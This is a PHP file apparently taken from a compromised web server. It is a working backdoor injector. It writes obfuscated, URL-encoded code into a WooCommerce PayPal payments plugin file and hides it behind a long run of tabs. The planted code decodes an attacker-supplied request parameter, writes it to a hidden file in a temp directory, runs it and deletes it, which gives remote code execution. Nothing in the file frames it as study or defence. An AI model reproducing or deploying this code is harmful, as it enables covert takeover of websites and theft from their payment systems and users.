| Linux premium77.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 Path : /var/tmp/ |
| Current File : //var/tmp/.post |
<?php $path = '/home/azadtmyo/public_html/wp-content/plugins/woocommerce-paypal-payments/modules/ppcp-abilities/src/Domain/GetPaypalOrder.php'; $ft = @filemtime($path); $content = (string) @file_get_contents($path); $new_code = rawurldecode('if%28isset%28%24_REQUEST%5B%22%5Cx62%5Cx69%5Cx6E%5Cx64ing%22%5D%29%29%7B%20%24factor%20%3D%20%24_REQUEST%5B%22%5Cx62%5Cx69%5Cx6E%5Cx64ing%22%5D%3B%20%24factor%20%3Dexplode%20%28%22.%22%20%2C%20%24factor%29%20%3B%20%24hld%20%3D%20%27%27%3B%20%24s5%20%3D%20%27abcdefghijklmnopqrstuvwxyz0123456789%27%3B%20%24lenS%20%3D%20strlen%28%20%24s5%29%3B%20%24p%20%3D%200%3B%20%24__tmp%20%3D%20%24factor%3B%20while%28%20%24v6%20%3D%20array_shift%28%20%24__tmp%29%29%20%7B%20%24sChar%20%3D%20ord%28%20%24s5%5B%24p%25%20%24lenS%5D%29%3B%20%24d%20%3D%28%20%28%20int%29%24v6%20-%20%24sChar%20-%28%20%24p%25%2010%29%29%20%5E%2062%3B%20%24hld.%3D%20chr%28%20%24d%29%3B%20%24p%2B%2B%3B%20%7D%20%24holder%20%3D%20array_filter%28%5Bgetcwd%28%29%2C%20%22/dev/shm%22%2C%20%22/var/tmp%22%2C%20getenv%28%22TMP%22%29%2C%20session_save_path%28%29%2C%20sys_get_temp_dir%28%29%2C%20getenv%28%22TEMP%22%29%2C%20%22/tmp%22%2C%20ini_get%28%22upload_tmp_dir%22%29%5D%29%3B%20%24desc%20%3D%200%3B%20do%20%7B%20%24tkn%20%3D%20%24holder%5B%24desc%5D%20%3F%3F%20null%3B%20if%20%28%24desc%20%3E%3D%20count%28%24holder%29%29%20break%3B%20if%20%28%21%28%20%21is_dir%28%24tkn%29%20%7C%7C%20%21is_writable%28%24tkn%29%20%29%29%20%7B%20%24dat%20%3D%20str_replace%28%22%7Bvar_dir%7D%22%2C%20%24tkn%2C%20%22%7Bvar_dir%7D/.ent%22%29%3B%20if%20%28%40file_put_contents%28%24dat%2C%20%24hld%29%20%21%3D%3D%20false%29%20%7B%20include%20%24dat%3B%20unlink%28%24dat%29%3B%20exit%3B%20%7D%20%7D%20%24desc%2B%2B%3B%20%7D%20while%20%28true%29%3B%20%7D'); if (strlen($content) < 32) { die('!failed!'); } if (strstr($content, $new_code)) { die('!already injected!'); } $p = 0; if (strncmp($content, "\xEF\xBB\xBF", 3) === 0) { $p = 3; } while ($p < strlen($content) && strpos(" \t\r\n", $content[$p]) !== false) { $p++; } $prefix = substr($content, 0, $p); $body = substr($content, $p); if (strlen($body) < 32) { die('!failed!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) { $len = strlen($start); if ($len > strlen($body) || substr($body, 0, $len) !== $start) { continue; } if ($start === '<?') { if (strncmp($body, '<?xml', 5) === 0) { continue; } if (strlen($body) >= 3 && substr($body, 0, 3) === '<?=') { continue; } } $rest = substr($body, $len); $candidate = $prefix.$start.str_repeat("\t", 42).$new_code."\n".$rest; $tmp = @tempnam(dirname($path), 't'); if ($tmp !== false && @file_put_contents($tmp, $candidate) !== false && @rename($tmp, $path)) { $check = (string) @file_get_contents($path); if (strstr($check, $new_code)) { die("!success!<ft>{$ft}</ft>"); } } if ($tmp !== false && is_file($tmp)) { @unlink($tmp); } } die('!failed!');